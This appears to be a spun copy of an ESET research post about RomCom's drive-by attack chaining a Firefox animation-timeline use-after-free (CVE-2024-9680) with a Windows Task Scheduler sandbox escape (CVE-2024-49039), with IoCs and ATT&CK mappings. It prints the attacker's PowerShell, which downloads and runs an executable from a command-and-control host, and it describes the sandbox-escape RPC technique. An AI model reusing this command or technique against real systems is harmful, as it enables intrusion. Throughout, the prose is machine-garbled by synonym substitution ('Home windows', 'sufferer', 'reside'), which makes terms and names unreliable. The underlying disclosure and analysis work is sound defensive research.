HomeSample Page

Sample Page Title


ESET researchers found a beforehand unknown vulnerability in Mozilla merchandise, exploited within the wild by Russia-aligned group RomCom. That is not less than the second time that RomCom has been caught exploiting a big zero-day vulnerability within the wild, after the abuse of CVE-2023-36884 by way of Microsoft Phrase in June 2023.

This essential vulnerability, assigned CVE-2024-9680 with a CVSS rating of 9.8, permits susceptible variations of Firefox, Thunderbird, and the Tor Browser to execute code within the restricted context of the browser. Chained with one other beforehand unknown vulnerability in Home windows, assigned CVE-2024-49039 with a CVSS rating of 8.8, arbitrary code could be executed within the context of the logged-in consumer. In a profitable assault, if a sufferer browses to an internet web page containing the exploit, an adversary can run arbitrary code – with none consumer interplay required – which on this case led to the set up of RomCom’s eponymous backdoor on the sufferer’s pc.

Key factors of this blogpost:

  • On October 8th, 2024, ESET researchers found a beforehand unknown zero-day vulnerability in Mozilla merchandise being exploited within the wild.
  • Evaluation of the exploit led to the invention of the vulnerability, now assigned CVE-2024-9680: a use-after-free bug within the animation timeline function in Firefox. Mozilla patched the vulnerability on October 9th, 2024.
  • Additional evaluation revealed one other zero-day vulnerability in Home windows: a privilege escalation bug, now assigned CVE‑2024‑49039, that enables code to run outdoors of Firefox’s sandbox. Microsoft launched a patch for this second vulnerability on November 12th, 2024.
  • Profitable exploitation makes an attempt delivered the RomCom backdoor, in what appears like a widespread marketing campaign.

RomCom profile

RomCom (often known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts each opportunistic campaigns in opposition to chosen enterprise verticals and focused espionage operations. The group’s focus has shifted to incorporate espionage operations amassing intelligence, in parallel with its extra standard cybercrime operations. The backdoor utilized by the group is able to executing instructions and downloading further modules to the sufferer’s machine.

Desk 1 reveals the sectors focused, in accordance with our analysis, by RomCom in 2024. This highlights that the group is engaged in espionage but in addition cybercrime operations.

Desk 1. RomCom victims in 2024

Vertical and areaObjectiveFirst seen
Governmental entity in UkraineEspionage2024-01
Pharmaceutical sector within the USCybercrime2024-03
Authorized sector in GermanyCybercrime2024-03
Insurance coverage sector within the USCybercrime2024-04
Protection sector in UkraineEspionage2024-08
Power sector in UkraineEspionage2024-08
Governmental entities in EuropeEspionage2024-08
Worldwide focusing on – Firefox exploitUnknown2024-10

Compromise chain

The compromise chain consists of a pretend web site that redirects the potential sufferer to the server internet hosting the exploit, and may the exploit succeed, shellcode is executed that downloads and executes the RomCom backdoor – an instance of which is depicted in Determine 1. Whereas we don’t know the way the hyperlink to the pretend web site is distributed, nevertheless, if the web page is reached utilizing a susceptible browser, a payload is dropped and executed on the sufferer’s pc with no consumer interplay required. Lastly, a JavaScript redirection is carried out utilizing window.location.href after a number of seconds, giving the exploit time to run.

Figure 1. Exploit chain to compromise the victim
Determine 1. Exploit chain to compromise the sufferer

From October 10th, 2024 to October 16th, 2024, simply after the primary vulnerability was patched, we discovered different C&C servers internet hosting the exploit. They used a recurring naming scheme for his or her pretend servers by including the prefix or suffix redir or crimson to a authentic area, generally additionally altering its top-level area (TLD), as proven in Desk 2. The redirection on the finish of the exploitation try took the victims to the authentic web site on the unique area title, presumably to keep away from elevating the targets’ suspicions.

Desk 2. Faux servers redirecting to the exploit

First seenFaux serverLast redirect toRedirect web site goal
2024⁠-⁠10⁠-⁠10redircorrectiv[.]comcorrectiv.orgNonprofit impartial newsroom.
2024⁠-⁠10⁠-⁠14devolredir[.]comdevolutions.internetDistant entry and password administration options.
2024⁠-⁠10⁠-⁠15redirconnectwise[.]cloudconnectwise.comMSP know-how and IT administration software program.
2024⁠-⁠10⁠-⁠16redjournal[.]cloudconnectwise.com

If a sufferer utilizing a susceptible browser visits an internet web page serving this exploit, the vulnerability is triggered and shellcode is executed in a content material course of. The shellcode consists of two components: the primary retrieves the second from reminiscence and marks the containing pages as executable, whereas the second implements a PE loader primarily based on the open-source venture Shellcode Reflective DLL Injection (RDI).

The loaded library implements a sandbox escape for Firefox that results in downloading and executing the RomCom backdoor on the sufferer’s pc. The backdoor is staged at a C&C server situated at journalctd[.]reside, correctiv[.]sbs, or cwise[.]retailer, relying on the pattern.

Based on our telemetry, from October 10th, 2024 to November 4th, 2024, potential victims who visited web sites internet hosting the exploit have been situated largely in Europe and North America, as proven in Determine 2. The variety of potential targets runs from a single sufferer per nation to as many as 250, in accordance with ESET telemetry.

Figure 2. Heatmap of potential victims
Determine 2. Heatmap of potential victims

CVE-2024-9680: Use-after-free in Firefox animation timeline

On October 8th, 2024, we discovered attention-grabbing information used to ship the RomCom backdoor, hosted on the server 1drv.us[.]com managed by the menace actor. The exploits goal a use-after-free vulnerability in Firefox animation timelines, permitting an attacker to attain code execution in a content material course of. Throughout our investigation, we analyzed the information referenced in Desk 3.

Desk 3. Information associated to the exploit

TitleDescription
main-128.jsJavaScript file containing the exploit for variations of Firefox from 106 to 128.
main-129.jsJavaScript file containing the exploit for variations of Firefox from 129 to 131.
main-tor.jsJavaScript file containing the exploit for Tor Browser variations 12 and 13.
script.jsJavaScript file used to generate a CAPTCHA.
utils.jsJavaScript file containing helper capabilities, e.g., to transform knowledge varieties, or to get the OS kind or browser model.
animation0.htmlHTML iframe loaded by the exploit to set off the use-after-free vulnerability.
index.htmlHTML web page loading the exploit and redirecting to a authentic web site after a number of seconds.

Timestamps associated to those information point out that they have been created on October 3rd, 2024 and made obtainable on-line; however, the menace actor might need been in possession of this exploit sooner than this.

We reported the vulnerability to Mozilla shortly after discovery, with the next timeline of occasions:

  • 2024-10-08: Discovery and preliminary evaluation.
  • 2024-10-08: Vulnerability reported to Mozilla.
  • 2024-10-08: Vulnerability acknowledged by Mozilla.
  • 2024-10-09: CVE-2024-9680 assigned by Mozilla Company.
  • 2024-10-09: Vulnerability patched in Firefox, Safety Advisory 2024-51.
  • 2024-10-09: Vulnerability patched in Tor Browser with launch 13.5.7.
  • 2024-10-10: Vulnerability patched in Tails with launch 6.8.1.
  • 2024-10-10: Vulnerability patched in Thunderbird, Safety Advisory 2024-52.

We wish to thank the workforce at Mozilla for being very responsive and spotlight their spectacular work to launch a patch inside a day.

Mozilla and the Tor Venture launched a patch that fixes the vulnerability within the following variations:

  • Firefox 131.0.2
  • Firefox ESR 115.16.1
  • Firefox ESR 128.3.1
  • Tor Browser 13.5.7
  • Tails 6.8.1
  • Thunderbird 115.16
  • Thunderbird 128.3.1
  • Thunderbird 131.0.1

In the course of the preparation of this blogpost, impartial researcher Dimitri Fourny launched a detailed evaluation of the vulnerability on November 14th, 2024.

Root trigger evaluation

The main-<Firefox model>.js first checks the precise model of the browser, and determines its exploitability by checking some particular objects’ offsets and sizes for an affected model. If these checks go, it proceeds so as to add an HTML iframe into the exploit web page, applied in animation0.html. The latter creates 4 HTML div parts recognized respectively as target0 to target3, however most significantly it defines a getter operate for the Object.prototype’s then property as proven in Determine 3. This operate will set off the use-after-free vulnerability as defined under. Notice that the feedback (in darkish inexperienced) are from the exploit authors; this might point out that the exploit was nonetheless in a developmental part or that the menace actor purchased it.

Figure 3. The JavaScript exploit defines the then property’s getter function on every object
Determine 3. The JavaScript exploit defines the then property’s getter operate on each object, triggering a use-after-free vulnerability

After some preliminary heap spraying, the put together operate creates 4 Animation objects, one for every div aspect beforehand created, as illustrated in Determine 4. These animation objects are dealt with by an AnimationTimeline object.

Figure 4. The exploit code creates animation objects for div elements
Determine 4. The exploit code creates animation objects for div parts

In the course of the doc animation timeline, the take a look at operate is known as, which pauses and will get the prepared property of the primary and second animation objects. As said within the documentation, the prepared property returns a Promise that resolves when the animation is able to be performed. Calling the then technique on the promise causes the getter operate proven in Determine 3 to be referred to as. Primarily, this operate increments a world flag variable and when it reaches 2, the primary animation object (anim0) is cancelled, and all of the div parts are eliminated. The decision to the rm0 operate (proven in Determine 3) units the animation objects to null with a view to free them, which triggers the use-after-free vulnerability. This operate additionally does some heap feng shui and, within the initially found exploit, calls the getInfo operate chargeable for reaching code execution.

Within the meantime, because the animation0.html doc is being refreshed, the Tick technique of its AnimationTimeline object is known as periodically. As seen in Determine 5, this technique iterates over the totally different animation objects current within the animation timeline and appends animations to be eliminated to a neighborhood array variable referred to as animationsToRemove.

Figure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to local array variable animationsToRemove
Determine 5. In AnimationTimeline::Tick, animation objects to be eliminated are appended to native array variable animationsToRemove

The bug lies in that, whereas iterating over the totally different animation objects of the animation timeline, the Tick technique of the Animation object is known as, which might result in the releasing of the present animation object, leading to dealing with a dangling pointer. Whereas debugging the exploit, we noticed a sequence of calls that finally ended up within the getter operate defined above, as illustrated in Determine 6 and Determine 7.

Figure 6. Call stack of the animation being cancelled
Determine 6. Name stack of the animation being cancelled by the getter operate referred to as by way of the Animation::Tick technique
Figure 7. The Animation PauseAt method ends up calling the getter function
Determine 7. The Animation::PauseAt technique finally ends up calling the getter operate

The getter operate calls Animation::Cancel which in flip calls AnimationTimeline::RemoveAnimation. Then, the animation objects anim0 and anim1 are set to null to ensure that them to get freed. When AnimationTimeline::Tick then iterates over the array animationsToRemove (line 74 in Determine 5), AnimationTimeline::RemoveAnimation will manipulate a dangling pointer of an Animation object that was already eliminated, as proven in Determine 8.

Figure 8. Call stack of the crash in AnimationTimeline RemoveAnimation
Determine 8. Name stack of the crash in AnimationTimeline::RemoveAnimation whereas manipulating a dangling pointer

After releasing the animations within the rm0 operate, the exploit proceeds with extra heap administration with a view to management the objects that can change the freed animations, and at last, the getInfo operate is known as, as seen in Determine 9.

Figure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it
Determine 9. Exploit code operate rm0 triggers the use-after-free bug and exploits it

With out going into an excessive amount of element concerning the exploit code, its creator abused div objects and their attributes in addition to ImageData objects to leak properties of the latter, as noticed in Determine 10.

Figure 10. Exploit code getInfo function attempts to leak an ImageData object
Determine 10. Exploit code getInfo operate makes an attempt to leak an ImageData object

Then, the exploit code proceeds to govern ArrayBuffer objects in order to leak the deal with of an arbitrary JavaScript object (often known as an addrof primitive) and abuse the Firefox JIT compiler to execute the primary shellcode part within the context of a content material course of, as illustrated in Determine 11. This method is defined in nice element on this blogpost.

Figure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode
Determine 11. The exploit code abuses the Firefox JIT compiler to execute shellcode

Mozilla patched the vulnerability in Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 on October 9th, 2024. Primarily, the tips to the animation objects dealt with by the timeline are actually applied by reference-counting pointers (RefPtr), as instructed by the diff, which prevents the animations from being freed, since AnimationTimeline::Tick will nonetheless maintain a reference to them.

Shellcode evaluation

Each shellcodes are saved within the JavaScript exploit file main-<Firefox model>.js. The primary one is dynamically created as an array of float numbers whereas the second is saved as an enormous array of bytes.

Egghunting shellcode

This primary shellcode merely retrieves the second shellcode by looking out in reminiscence for a hardcoded magic worth of 0x8877665544332211, adjustments its reminiscence safety to read-write-execute (RWX), and executes the code situated at this deal with.

Reflective loader shellcode

This second shellcode is the compiled model of the Shellcode RDI venture, which permits a DLL to be loaded. The constants used within the shellcode weren’t modified by the menace actor (see https://github.com/monoxgas/sRDI/blob/grasp/Native/Loader.cpp#L367 vs. the constants proven in Determine 12).

Figure 12. The constants used in the public Shellcode RDI project remained unchanged
Determine 12. The constants used within the public Shellcode RDI venture remained unchanged

The shellcode merely hundreds an embedded library whose sole goal is to flee the restrictions of Firefox’s sandboxed content material course of.

CVE-2024-49039: Privilege escalation in Home windows Process Scheduler

The loaded library (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its builders and compiled on October 3rd, 2024, implements a sandbox escape from the untrusted course of degree of the content material course of to a medium degree. Primarily, the library makes use of an undocumented RPC endpoint, which mustn’t have been callable from an untrusted course of degree, to launch a hidden PowerShell course of that downloads a second stage from a C&C server.

The timeline of the vulnerability disclosure is the next:

  • 2024-10-08: As a part of our preliminary report back to Mozilla for CVE-2024-9680, we additionally offered what we believed to be a sandbox escape.
  • 2024-10-14: Mozilla’s safety workforce confirmed the sandbox escape and deemed the vulnerability to be tied to a Home windows safety flaw. They suggested us that they’d contacted the Microsoft Safety Response Middle (MSRC) to evaluate the vulnerability.
  • 2024-11-12: Microsoft launched an advisory for CVE-2024-49039 and its corresponding patch by the replace KB5046612. The vulnerability was additionally independently discovered by Vlad Stolyarov and Bahare Sabouri of Google’s Risk Evaluation Group, as talked about in KB5046612.

Root trigger evaluation

The sandbox escape code resides within the comparatively small principal operate of the library. It makes use of an undocumented RPC endpoint, as illustrated in Determine 13.

Figure 13. The PocLowIL library prepares to interact with a task-related endpoint
Determine 13. The PocLowIL library prepares to work together with a task-related endpoint

The operate proceeds to populate undocumented buildings and calls NdrClientCall2 thrice. The primary parameter handed to this operate, pStubDescriptor, is a MIDL_STUB_DESC construction whose RpcInterfaceInformation member factors to an interface recognized by the GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. This interface is applied within the Home windows library WPTaskScheduler.dll, loaded by schedsvc.dll, hosted within the technique of the duty scheduler service (svchost.exe).

Based on our evaluation of this interface, the sandbox escape code calls the next capabilities:

  • s_TaskSchedulerCreateSchedule
  • s_TaskSchedulerExecuteSchedule
  • s_TaskSchedulerDeleteSchedule (used just for cleanup)

Utilizing RpcView and after partially reversing some buildings, we found out the principle buildings, as illustrated in Determine 14.

Figure 14. The main structures used to create a scheduled task through the RPC interface
Determine 14. The primary buildings used to create a scheduled process by the RPC interface

After making use of these buildings in IDA Professional, we obtained a clearer overview of the duty, as seen in Determine 15.

Figure 15. IDA Pro pseudocode view of the sandbox escape code
Determine 15. IDA Professional pseudocode view of the sandbox escape code

Primarily based on the code, the malicious library creates a scheduled process that can run an arbitrary utility at medium integrity degree, permitting the attackers to raise their privileges on the system and get away of the sandbox. That is doable as a result of lack of restrictions imposed on the safety descriptor utilized to the RPC interface throughout its creation, as illustrated in Determine 16.

Figure 16. Permissive security descriptor applied to the RPC interface
Determine 16. Permissive safety descriptor utilized to the RPC interface

The renamed variable interface_security_descriptor, used when RpcServerRegisterIf3 is known as, has the next worth: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). Based on the Safety Descriptor Definition Language (SDDL), it permits everybody (WD) to speak with the RPC interface and name its procedures no matter their integrity degree.

Exploitation

On this case, the menace actor created a process named firefox.exe that can launch conhost.exe in headless mode with a view to cover the kid course of window. The deobfuscation of the remainder of the command line (proven in Determine 15) revealed the PowerShell code seen in Determine 17.

$a=$env:public + 'public';
Invoke-WebRequest https://journalctd[.]reside/JfWb4OrQPLh -o $a;
sleep 15;
Rename-Merchandise $a ($a = ($a + '.exe')) # $env:publicpublic.exe
Begin-Course of $a;
sleep 10;
Rename-Merchandise $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:publicepublic.exe
Begin-Course of $a

Determine 17. PowerShell code downloading a next-stage part

An executable is downloaded from https://journalctd[.]reside/JfWb4OrQPLh, saved within the %PUBLIC% folder as public.exe, and run. After 10 seconds, it’s renamed as epublic.exe and run once more.

Transient patch evaluation

The patched model of WPTaskScheduler.dll (model 10.0.19041.5129) launched with KB5046612 makes use of a extra sophisticated safety descriptor, as proven in Determine 18.

Figure 18. The security descriptor introduced by the patch is more restrictive
Determine 18. The safety descriptor launched by the patch is extra restrictive

The brand new safety descriptor is:

D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)

Breaking down the string reveals the next restriction logic:

  • the system (SY) and native service (LS) accounts are granted learn, write, and execute entry,
  • the community service (NS) account and interactive customers (IU) are granted solely learn entry,
  • lastly, objects under medium degree (ME) integrity are denied learn, write, and execute entry.

The brand new restrictions imposed by the up to date safety descriptor stop the privilege escalation and render the sandbox escape code out of date.

Conclusion

Chaining collectively two zero-day vulnerabilities armed RomCom with an exploit that requires no consumer interplay. This degree of sophistication reveals the menace actor’s will and means to acquire or develop stealthy capabilities. ESET shared detailed findings with Mozilla, following our coordinated vulnerability disclosure course of shortly after discovery. Mozilla launched a blogpost about how they reacted to the disclosure and have been capable of launch a repair inside 25 hours, which may be very spectacular compared to trade requirements.

For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com
ESET Analysis presents non-public APT intelligence experiences and knowledge feeds. For any inquiries about this service, go to the ESET Risk Intelligence web page.

IoCs

A complete checklist of indicators of compromise and samples could be present in our GitHub repository.

Information

SHA-1FilenameDetectionDescription
A4AAD0E2AC1EE0C8DD25968FA4631805689757B6utils.jsJS/Exploit.Agent.NSFRomCom Firefox exploit.
CA6F8966A3B2640F49B19434BA8C21832E77A031main-tor.jsJS/Exploit.Agent.NSERomCom Firefox exploit.
21918CFD17B378EB4152910F1246D2446F9B5B11main-128.jsJS/Exploit.Agent.NSERomCom Firefox exploit.
703A25F053E356EB6ECE4D16A048344C55DC89FDmain-129.jsJS/Exploit.Agent.NSERomCom Firefox exploit.
ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6PocLowIL.dllWin64/Runner.ADRomCom Firefox sandbox escape.
A9D445B77F6F4E90C29E385264D4B1B95947ADD5PocLowIL.dllWin64/Runner.ADRomCom Tor browser sandbox escape.

Community

IPAreaInternet hosting supplierFirst seenParticulars
194.87.189[.]171journalctd[.]resideAeza Worldwide LTD2024⁠-⁠10⁠-⁠08RomCom second-stage C&C server.
178.236.246[.]241correctiv[.]sbsAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠09RomCom second-stage C&C server.
62.60.238[.]81cwise[.]retailerAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠15RomCom second-stage C&C server.
147.45.78[.]102redircorrectiv[.]comAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠10RomCom exploit supply C&C server.
46.226.163[.]67devolredir[.]comAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠14RomCom exploit supply C&C server.
62.60.237[.]116redirconnectwise[.]cloudAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠15RomCom exploit supply C&C server.
62.60.237[.]38redjournal[.]cloudAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠16RomCom exploit supply C&C server.
194.87.189[.]191drv.us[.]comAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠08RomCom malware supply C&C server.
45.138.74[.]238economistjournal[.]cloudAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠16RomCom exploit redirection C&C server.
176.124.206[.]88N/AAEZA INTERNATIONAL LTD2024⁠-⁠10⁠-⁠08RomCom second-stage C&C server.

MITRE ATT&CK methods

This desk was constructed utilizing model 16 of the MITRE ATT&CK framework.

TacticIDTitleDescription
Useful resource ImprovementT1583Purchase InfrastructureRomCom units up VPSes and buys domains.
T1587.001Develop Capabilities: MalwareRomCom develops malware in a number of programming languages.
T1587.004Develop Capabilities: ExploitsRomCom might develop exploits used for preliminary compromise.
T1588.003Get hold of Capabilities: Code Signing CertificatesRomCom obtains legitimate code-signing certificates to signal its malware.
T1588.005Get hold of Capabilities: ExploitsRomCom might purchase exploits used for preliminary compromise.
T1588.006Get hold of Capabilities: VulnerabilitiesRomCom might acquire details about vulnerabilities it makes use of for focusing on victims.
T1608Stage CapabilitiesRomCom levels malware on a number of supply servers.
Preliminary EntryT1189Drive-by CompromiseRomCom compromises victims by a consumer visiting a web site internet hosting an exploit.
ExecutionT1053.005Scheduled Process/Job: Scheduled ProcessRomCom creates a scheduled process utilizing RCP to execute the subsequent stage downloader.
PersistenceT1546.015Occasion Triggered Execution: Element Object Mannequin HijackingThe RomCom backdoor hijacks DLLs loaded by explorer.exe or wordpad.exe for persistence.
Privilege EscalationT1068Exploitation for Privilege EscalationRomCom exploits a vulnerability to flee the Firefox sandbox.
Protection EvasionT1622Debugger EvasionThe RomCom backdoor detects debuggers by registering an exception handler.
T1480Execution GuardrailsThe RomCom backdoor checks whether or not the system state is appropriate for execution.
T1027.011Obfuscated Information or Data: Fileless StorageThe RomCom backdoor is saved encrypted within the registry.
T1553.002Subvert Belief Controls: Code SigningThe RomCom backdoor weakens safety mechanisms by utilizing trusted code-signing certificates.
Credential EntryT1555.003Credentials from Password Shops: Credentials from Internet BrowsersThe RomCom backdoor collects passwords, cookies, and classes utilizing a browser stealer module.
T1552.001Unsecured Credentials: Credentials In InformationThe RomCom backdoor collects passwords utilizing a file reconnaissance module.
DiscoveryT1087Account DiscoveryThe RomCom backdoor collects username, pc, and area knowledge.
T1518Software program DiscoveryThe RomCom backdoor collects details about put in software program and variations.
T1614System Location DiscoveryThe RomCom backdoor checks for a particular keyboard format ID (KLID).
Lateral MotionT1021Distant ProvidersThe RomCom backdoor creates SSH tunnels to maneuver laterally inside compromised networks.
Assortment T1560Archive Collected InformationThe RomCom backdoor shops knowledge in a ZIP archive for exfiltration.
T1185Man within the BrowserThe RomCom backdoor steals browser cookies, historical past, and saved passwords.
T1005Information from Native SystemThe RomCom backdoor collects particular file varieties primarily based on file extensions.
T1114.001E-mail Assortment: Native E-mail AssortmentThe RomCom backdoor collects information with .msg, .eml, and .e mail extensions.
T1113Display screen SeizeThe RomCom backdoor takes screenshots of the sufferer’s pc.
Command and ManagementT1071.001Normal Utility Layer Protocol: Internet ProtocolsThe RomCom backdoor makes use of HTTP or HTTPS as a C&C protocol.
T1573.002Encrypted Channel: Uneven CryptographyThe RomCom backdoor encrypts communication utilizing SSL certificates.
ExfiltrationT1041Exfiltration Over Command-and-Management ChannelThe RomCom backdoor exfiltrates knowledge utilizing the HTTPS C&C channel.
ImpressionT1565Information ManipulationRomCom manipulates methods and steals knowledge.
T1657Monetary TheftRomCom compromises firms for monetary curiosity.

Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles